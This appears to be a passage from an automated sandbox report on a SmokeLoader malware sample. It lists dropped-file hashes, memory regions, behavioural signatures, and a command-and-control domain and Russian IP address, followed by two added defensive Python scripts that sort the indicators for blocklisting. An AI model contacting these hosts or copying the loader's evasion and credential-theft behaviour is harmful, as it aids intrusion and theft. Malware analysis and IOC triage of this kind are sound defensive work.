| SHA256 | fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408 |
| SHA512 | cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319 |
memory/2312-153-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar5BC8.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar5D54.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/1548-201-0x0000000000C50000-0x0000000000D50000-memory.dmp
memory/2808-200-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1548-202-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2808-204-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2808-207-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2808-208-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2128-210-0x0000000000400000-0x0000000000644000-memory.dmp
memory/1868-227-0x0000000000230000-0x0000000000330000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DFB7.exe
| MD5 | 9e52aa572f0afc888c098db4c0f687ff |
| SHA1 | ef7c2bb222e69ad0e10c8686eb03dcbee7933c2b |
| SHA256 | 4a40f9d491f09521f4b0c6076a0eb488f6d8e1cf4b67aa6569c2ccce13556443 |
| SHA512 | d0991e682ae8c954721e905753b56c01f91b85313beb9996331793c3efa8acc13d574ef5ba44853ecc3e05822931ed655bad1924fa11b774a43e015f42185f62 |
memory/2684-235-0x0000000000A60000-0x0000000001745000-memory.dmp
memory/2684-244-0x0000000000A60000-0x0000000001745000-memory.dmp
memory/2684-273-0x00000000001D0000-0x00000000001D1000-memory.dmp
\Users\Admin\AppData\Local\Temp\DFB7.exe
| MD5 | e2ebfec64d8bd97a0f742ca80c58a2cf |
| SHA1 | 647ba7618ef94e1faf9c7bd6697a3672ce59ce51 |
| SHA256 | d26e2bdc1d1ea864335e8f261f48cfd9628eaf25f9414af05e59f780cdbbde4a |
| SHA512 | e9839a52637945d078bb54c5dcefdbc7094b5753215cac9c1053f1d34a1d833b52ff31fe0935076cdad0616fd73338ed40269462f2323373084ebf44bb8a481a |
\Users\Admin\AppData\Local\Temp\7D2.exe
| MD5 | d8133933c35b3641839b23fd75109c45 |
| SHA1 | a80e7473903a2d79fac4198bb5a80fc6ea968c87 |
| SHA256 | 9393404a775a29519a48dedcefc783a2063e69a2c66cf106d23fa4d1c60ae547 |
| SHA512 | 9bfdc4fdeaeb87c737aeb54ee0575a2bb1e0e13636a173e144f97559c88d05971910c7f3c569ba8a361eea349960eaf1066c41afafa4b4b35f8c91bdd20f66a4 |
C:\Users\Admin\AppData\Local\Temp\7D2.exe
| MD5 | 450039a02217c53bd983eaf1fd34505a |
| SHA1 | 930ed58a2f58ca7bf3e39aaee43fb541f1c6eeda |
| SHA256 | d2eacbc922f248856b860aa7c31476ae4123f97e82cf69760ef216d9dca321f0 |
| SHA512 | cf37a82ea7b64f4633ac82c73feff3f829dda279a7caeac32a4cde7b0f82a43b37f67e620677a87d2eccc0eee6f8d68d0175a086487b2174b4f30b66aa4fb080 |
memory/2684-297-0x0000000000A60000-0x0000000001745000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
| MD5 | efc1577f95c9a449fcaf9c8c4ba97486 |
| SHA1 | 9f8c996d0b1d5994449e32e32ec5b29af4f62b70 |
| SHA256 | 6ab35dffd2a577d4e2478bcfa21fd1d17fc498c57582e0caaa518ecdf5c4c037 |
| SHA512 | c97fa8c4773d9f2058ca777a4a5d786ed9c5271f15553fd66cd2b50d3edbfda4af86cd0108aa291f6373e27e7f699dd36f9537b8041044492a03bbf2c7295ba2 |
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
| MD5 | bb2197a07962bd9e84512680932621a2 |
| SHA1 | 82c0278ced2d0b9241b13860f45fc499033a0956 |
| SHA256 | ca83b6d4ac408784b71721c0b97981a55cdf14431c8754c232f77450d4254094 |
| SHA512 | 04bdf960039d489bd79bfdb6590beb2d75ebce068abd0b5726852be401b52961c60062920e40e3ad8d1ccc1fea3204f4c85d02702b2b4796a32a7a79afb2aded |
memory/668-307-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/668-308-0x0000000076FA0000-0x0000000076FA2000-memory.dmp
memory/668-309-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/668-310-0x0000000002210000-0x0000000002212000-memory.dmp
memory/668-312-0x0000000000940000-0x0000000000941000-memory.dmp
memory/668-311-0x0000000002330000-0x0000000002331000-memory.dmp
memory/668-313-0x0000000002470000-0x0000000002471000-memory.dmp
memory/668-315-0x00000000008C0000-0x00000000008C1000-memory.dmp
memory/668-316-0x0000000000930000-0x0000000000931000-memory.dmp
memory/668-314-0x0000000000560000-0x0000000000561000-memory.dmp
memory/668-317-0x0000000002460000-0x0000000002461000-memory.dmp
memory/668-319-0x00000000008D0000-0x00000000008D1000-memory.dmp
memory/668-318-0x00000000008B0000-0x00000000008B1000-memory.dmp
memory/668-320-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/668-321-0x0000000002480000-0x0000000002481000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\61F4.exe
| MD5 | 0de19cd17462ea79db1a5e5fd1d7f59f |
| SHA1 | d2b313dcfbda9a04475fc01182336b52846bbe3b |
| SHA256 | c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b |
| SHA512 | 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c |
memory/2952-333-0x0000000000230000-0x0000000000330000-memory.dmp
memory/2952-334-0x0000000001BD0000-0x0000000001C3F000-memory.dmp
memory/2952-335-0x0000000000400000-0x00000000004AB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\70C4.exe
| MD5 | f727c0754ddda4ed6354375ab748735b |
| SHA1 | 2ad7d52a12f896817edfe511ec26212580dc5958 |
| SHA256 | 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899 |
| SHA512 | 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3 |
memory/832-341-0x0000000072880000-0x0000000072F6E000-memory.dmp
memory/832-340-0x0000000000800000-0x000000000089A000-memory.dmp
memory/668-347-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/2952-349-0x00000000026A0000-0x00000000026A1000-memory.dmp
memory/2952-358-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/668-359-0x0000000000570000-0x0000000000571000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
| MD5 | 98a8cb3f57539407ce621d4c6e7eca22 |
| SHA1 | cfba7b6935b6d3ccc0c468df459c9833d49fe287 |
| SHA256 | a89c33a00af285e59bf6d0c4fa32d71a7bfac103c9f69e3ec80afa84e2aa08da |
| SHA512 | 66738703799be176d5a086ed48ceac9499a88c9a2bf4b1a588f185de6f615cbc84568c07a7eb6fb3f7d5569f223a7d0f6bf49f7a44643452fabc1c22fd1efeeb |
memory/668-364-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/668-366-0x0000000002770000-0x0000000002771000-memory.dmp
memory/668-367-0x0000000000960000-0x0000000000E02000-memory.dmp
memory/832-370-0x0000000009270000-0x00000000092B0000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2832-377-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-378-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-379-0x0000000002680000-0x00000000026C0000-memory.dmp
memory/2832-380-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-381-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2484-382-0x0000000002680000-0x00000000026C0000-memory.dmp
memory/2832-383-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2832-384-0x00000000026B0000-0x00000000026F0000-memory.dmp
memory/2932-386-0x00000000005D0000-0x00000000006D0000-memory.dmp
memory/2932-387-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2484-393-0x000000006EDE0000-0x000000006F38B000-memory.dmp
memory/2832-394-0x000000006EDE0000-0x000000006F38B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\461186416230
| MD5 | d0ba858fef58669fbe660841cc1a6157 |
| SHA1 | 224cb30a7779391b616e5bfae06a8a24b726adcb |
| SHA256 | a3dd9a8710e1f41dc5d6e8cd6e1744aa367826cb740077e22df7a6e05bf37a07 |
| SHA512 | c19800e63d295e09e6c277222c846ae3cfc4e8c3e9a278c0e620657d035d6b69b267ab2ba27a4d3f30dd332f8da74b8b0b07ed63fcb5c7ec11eaffde4fa057a5 |
memory/832-402-0x0000000072880000-0x0000000072F6E000-memory.dmp
memory/1188-408-0x00000000008F0000-0x00000000009F0000-memory.dmp
memory/832-416-0x0000000009270000-0x00000000092B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | cb253bf8a6859eadd30b4ceb66c6a588 |
| SHA1 | 7e9383d51ec36a019b5884f79a2ac2c05b4049bd |
| SHA256 | 03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722 |
| SHA512 | 1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061 |
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 4876ee75ce2712147c41ff1277cd2d30 |
| SHA1 | 3733dc92318f0c6b92cb201e49151686281acda6 |
| SHA256 | bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed |
| SHA512 | 9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9 |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | fda0cdaf875e4daf0c482875f5a231e6 |
| SHA1 | 459bd14e4b5773b333f134d4d70bcf4b94e4ece2 |
| SHA256 | b85f8c66e7ccbcf27c5b06c463d3f1fe2b5511406edbf2eaba123a6ad4aad5ed |
| SHA512 | b6dc77346f4a35a8d0808d2cbcfbcec03867c4d76d1dc488ee68b3574b45af6694f5d525047f271826f74b9993c3ad58d591e520b2808543171510f0a2af26da |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 646474805e0a482a64c8fb0fd24cc193 |
| SHA1 | e0f3f06273ece606c9f652b446473dcc90525279 |
| SHA256 | a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd |
| SHA512 | b0fb54455c5e9d20f61d9aef49969d9fb84fe89fde53ea42b4b01f4822a61308018a054c16277da6b8d91b3219c55deeaf8f568ac5a7b049e3aa2b6f64d53fb0 |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 01a5858b5db7ecf9f3e7c5e6fd1444ca |
| SHA1 | 357d16d31867dba1119e78df7ba8559a5b6b9e24 |
| SHA256 | c14af4fa1c3a9df74306483ccee122ad9dc6849078038279db3996c02b5fc349 |
| SHA512 | 5c6f53958c33b53e166ae52fe7707cf86f158bc7f2e0bbc04ecf98f6486babf18781c5a251eb2a68f629c69f17a6c80c05162fdde4a58e48853d1b22490fddbb |
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 5bd578971972e12323f2c4033f52d7a2 |
| SHA1 | 66253c74011718950a6425c61e81ccc4ef906f0f |
| SHA256 | f0e2ed19ddddd7e5a6e46358e74088bce72d1e6028ea2db081dc311e5484f449 |
| SHA512 | 2b1ccf5dff72b3a351613819a9437cf0d3aa6e8036029e1a2f5f1636cb9ab0ced399ef70cac7d30ef2f8edabe644df9d09f39121dec4463dd521a700ea099e17 |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | d605ca01b165bd905586b87c5c89c276 |
| SHA1 | 092572262fb11c44cac1a51de3b2e2c26842ea68 |
| SHA256 | f9f4ccdf63431abd99696354a89696e1b53f062921c44a005f486a3e6e45346b |
| SHA512 | 243f04c10c7d2aff46a8b9700bcd23f7d2a42687279c685e6239f673683fae6a0685838dd6ac4ea4eaf78c8b64c7d0b88f4d4ce93e85161dada030aae70e5063 |
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | c7e050428b9fa0683592b7b62064e87d |
| SHA1 | c780fed59c78e33d85610290c84043a529af9b08 |
| SHA256 | e7bd37cd12fbf47e317815c366e51f59b713ba8b55f9bf258381d6a934614df9 |
| SHA512 | a4155e248240397f19696a53eb0638a2618e41c46f2c59899e44e0f407dbfa2265ee5ea329d988b47c40de420177a9c01a40c77788229fc200811b9689b3b825 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPTK2T6EEJKO4F1ZGR09.temp
| MD5 | 61cd8de64ade8138ac9f87c1922e1426 |
| SHA1 | 71a043d8591bd470b63f69af1a49dd365a18d07b |
| SHA256 | 3e9f3c51cf7be1d0566d3898363c96ffb33a3ac1e29a69c7e9b4ca0b6cdf887b |
| SHA512 | 048e9ac720f57bf74b584e25b7f759d4fc5a5791a8fc18f516dd02ffee541d975cba47e18f0ee14753cfda78f51674099090a3ec0dc221e98bd8e94622c55b42 |
memory/744-451-0x000000001B2B0000-0x000000001B592000-memory.dmp
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll
| MD5 | ca684dc5ebed4381701a39f1cc3a0fb2 |
| SHA1 | 8c4a375aa583bd1c705597a7f45fd18934276770 |
| SHA256 | b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2 |
| SHA512 | 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-15 00:59
Reported
2024-03-15 01:04
Platform
win10-20240221-en
Max time kernel
299s
Max time network
299s
Command Line
Signatures
SmokeLoader
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | N/A | N/A |
(61 further identical rows, each a process-enumeration event for which the sandbox recorded no process or indicator, are collapsed here)
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\thdutdt | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe
"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"
C:\Users\Admin\AppData\Roaming\thdutdt
C:\Users\Admin\AppData\Roaming\thdutdt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 197.159.94.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tradein-myus.com | udp |
| US | 8.8.8.8:53 | trade-inmyus.com | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
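The Network table above mixes three different kinds of event: one actual TCP connection (port 80 to 81.94.159.197, resolved from trad-einmyus.com), forward lookups of look-alike domains that were never connected to (tradein-myus.com, trade-inmyus.com), and reverse (in-addr.arpa) lookups, only one of which corresponds to a host the sample actually talked to. The script below is an added example written for this page, not part of the sandbox report or of any tool it names. The rows in NETWORK_ROWS are copied verbatim from the table; the parsing and the three-way split (contacted, resolved-only, reverse-only) are this example's own choices about how to turn the table into a blocklist without promoting every PTR-lookup target to an IOC.

```python
"""Split a sandbox Network table into contacted hosts vs. DNS-only activity.

Added example (editor's code, not part of the sandbox report). NETWORK_ROWS is
copied from the behavioral2 Network table; the parsing and classification are
this example's own assumptions about what an analyst wants from it.
"""
import ipaddress

# Copied from the report's behavioral2 Network table (country, destination, domain, proto).
NETWORK_ROWS = """
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 197.159.94.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tradein-myus.com | udp |
| US | 8.8.8.8:53 | trade-inmyus.com | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
"""


def parse_rows(text):
    """Parse '| country | ip:port | domain | proto |' rows into dicts; skip anything else."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or ":" not in cells[1]:
            continue
        country, dest, domain, proto = cells
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def ptr_to_ip(name):
    """'197.159.94.81.in-addr.arpa' -> '81.94.159.197'; None if not an IPv4 PTR name."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    ip = ".".join(reversed(octets))
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return None
    return ip


def classify(rows):
    """Return contacted hosts, resolved-only domains and reverse-lookup targets.

    A row to port 53/udp is treated as a DNS query (the sandbox resolver is
    8.8.8.8 here); everything else is a real connection to the destination.
    """
    contacted = {}        # ip -> row of the non-DNS connection
    forward = set()       # domains that were only resolved
    reverse = set()       # IPs whose PTR record was looked up
    for r in rows:
        if r["port"] == 53 and r["proto"] == "udp":
            ip = ptr_to_ip(r["domain"])
            if ip:
                reverse.add(ip)
            else:
                forward.add(r["domain"])
        else:
            contacted[r["ip"]] = r
    contacted_domains = {r["domain"] for r in contacted.values()}
    return {
        "contacted": contacted,
        "resolved_only": sorted(forward - contacted_domains),
        "reverse_of_contacted": sorted(ip for ip in reverse if ip in contacted),
        "reverse_only": sorted((ip for ip in reverse if ip not in contacted),
                               key=ipaddress.IPv4Address),
    }


if __name__ == "__main__":
    result = classify(parse_rows(NETWORK_ROWS))
    for ip, r in result["contacted"].items():
        print(f"contacted  {ip}:{r['port']}/{r['proto']}  via {r['domain']}  [{r['country']}]")
    print("resolved only:", ", ".join(result["resolved_only"]))
    print("PTR of contacted:", ", ".join(result["reverse_of_contacted"]))
    print("PTR only (not contacted):", ", ".join(result["reverse_only"]))
```

Only the contacted entry and the domain it resolved from belong on a blocklist from this table; the two look-alike domains are worth watching as candidate fallback C2 names, and the PTR-only addresses should be checked against sandbox and OS background traffic before being treated as indicators.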
Files
memory/2356-2-0x00000000001F0000-0x00000000001FB000-memory.dmp
memory/2356-1-0x00000000007D0000-0x00000000008D0000-memory.dmp
memory/2356-3-0x0000000000400000-0x0000000000720000-memory.dmp
memory/3344-4-0x0000000000BE0000-0x0000000000BF6000-memory.dmp
memory/2356-5-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Roaming\thdutdt
| MD5 | 15fbdb93344afb1b663ace05ee0d40c1 |
| SHA1 | 03cc060e4c749212cdbce07aeed5623e4f94c27e |
| SHA256 | 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 |
| SHA512 | 60f19cc94ff20a2675f906bdd4166df49336018d7362e03386e3dc2bf886ee35e31f4d0955738bea39a0943bea03661cb00405ff03736e9c2349f24b028bcabb |
memory/1012-14-0x0000000000A50000-0x0000000000B50000-memory.dmp
memory/1012-15-0x0000000000400000-0x0000000000720000-memory.dmp
memory/3344-16-0x00000000029C0000-0x00000000029D6000-memory.dmp
memory/1012-19-0x0000000000400000-0x0000000000720000-memory.dmp
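Three things in the Files sections of behavioral1 and behavioral2 are easy to misread when the hash tables are pulled straight into a blocklist: the `\??\PIPE\srvsvc` entry carries the digest of empty content (MD5 d41d8cd98f00b204e9800998ecf8427e, SHA256 e3b0c442...), so it is not an indicator of anything; cred64.dll and blyat.dll each appear several times at the same path with different hashes, meaning the path was rewritten with new content rather than that several files were dropped; and `C:\Users\Admin\AppData\Roaming\thdutdt` has the same SHA256 as the analysed sample, so it is a self-copy, not a new payload. The script below is an added example written for this page, not part of the sandbox report or of any tool it names. DROPPED_FILES holds (path, SHA256) pairs copied from both Files sections (memory-dump entries are left out because they are not files on disk); the triage rules and the path normalisation (case-fold and drop the drive letter, since the report lists the same file both with and without `C:`) are this example's own assumptions.

```python
"""Triage the dropped-file hash tables from a sandbox report.

Added example (editor's code, not part of the sandbox report). The entries
are copied from the behavioral1 and behavioral2 Files sections; the triage
rules applied to them are this example's own.
"""
import hashlib
from collections import defaultdict

# SHA256 of the analysed sample, from the report header.
PARENT_SHA256 = "1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50"

# (path, SHA256) pairs copied from the report's Files sections, in report order.
DROPPED_FILES = [
    (r"C:\Users\Admin\AppData\Local\Temp\61F4.exe", "c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b"),
    (r"C:\Users\Admin\AppData\Local\Temp\70C4.exe", "661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899"),
    (r"C:\Users\Admin\AppData\Local\Temp\5AC2.exe", "a89c33a00af285e59bf6d0c4fa32d71a7bfac103c9f69e3ec80afa84e2aa08da"),
    (r"\??\PIPE\srvsvc", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"),
    (r"C:\Users\Admin\AppData\Local\Temp\461186416230", "a3dd9a8710e1f41dc5d6e8cd6e1744aa367826cb740077e22df7a6e05bf37a07"),
    (r"C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll", "03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722"),
    (r"C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll", "bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed"),
    (r"\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll", "b85f8c66e7ccbcf27c5b06c463d3f1fe2b5511406edbf2eaba123a6ad4aad5ed"),
    (r"\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll", "a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd"),
    (r"\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll", "c14af4fa1c3a9df74306483ccee122ad9dc6849078038279db3996c02b5fc349"),
    (r"C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll", "f0e2ed19ddddd7e5a6e46358e74088bce72d1e6028ea2db081dc311e5484f449"),
    (r"\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll", "f9f4ccdf63431abd99696354a89696e1b53f062921c44a005f486a3e6e45346b"),
    (r"C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll", "e7bd37cd12fbf47e317815c366e51f59b713ba8b55f9bf258381d6a934614df9"),
    (r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPTK2T6EEJKO4F1ZGR09.temp", "3e9f3c51cf7be1d0566d3898363c96ffb33a3ac1e29a69c7e9b4ca0b6cdf887b"),
    (r"C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll", "b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2"),
    (r"C:\Users\Admin\AppData\Roaming\thdutdt", "1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50"),
]


def normalize_path(path):
    """Case-fold and drop a leading drive letter so 'C:\\x' and '\\x' group together (assumption)."""
    p = path.lower()
    if len(p) > 2 and p[1] == ":" and p[2] == "\\":
        p = p[2:]
    return p


def triage(entries, parent_sha256):
    """Split report entries into usable IOCs, empty-content noise, self-copies and rewrites."""
    empty_sha256 = hashlib.sha256(b"").hexdigest()  # computed, not hard-coded
    parent = parent_sha256.lower()
    by_path = defaultdict(list)
    result = {"skip_empty": [], "self_copies": [], "rewritten": {}, "iocs": []}
    for path, sha in entries:
        sha = sha.lower()
        if sha == empty_sha256:          # digest of zero bytes: not an indicator
            result["skip_empty"].append(path)
            continue
        if sha == parent:                # byte-identical copy of the analysed sample
            result["self_copies"].append(path)
        by_path[normalize_path(path)].append(sha)
    for npath, shas in by_path.items():
        distinct = list(dict.fromkeys(shas))   # preserve first-seen order
        if len(distinct) > 1:                  # same path, different content over time
            result["rewritten"][npath] = distinct
    all_hashes = {s for shas in by_path.values() for s in shas}
    result["iocs"] = sorted(all_hashes - {parent})   # parent hash is already known
    return result


if __name__ == "__main__":
    r = triage(DROPPED_FILES, PARENT_SHA256)
    print("skipped (empty content):", r["skip_empty"])
    print("self-copies of the sample:", r["self_copies"])
    for p, hashes in r["rewritten"].items():
        print(f"rewritten {len(hashes)}x: {p}")
    print(f"{len(r['iocs'])} distinct SHA256 IOCs")
```

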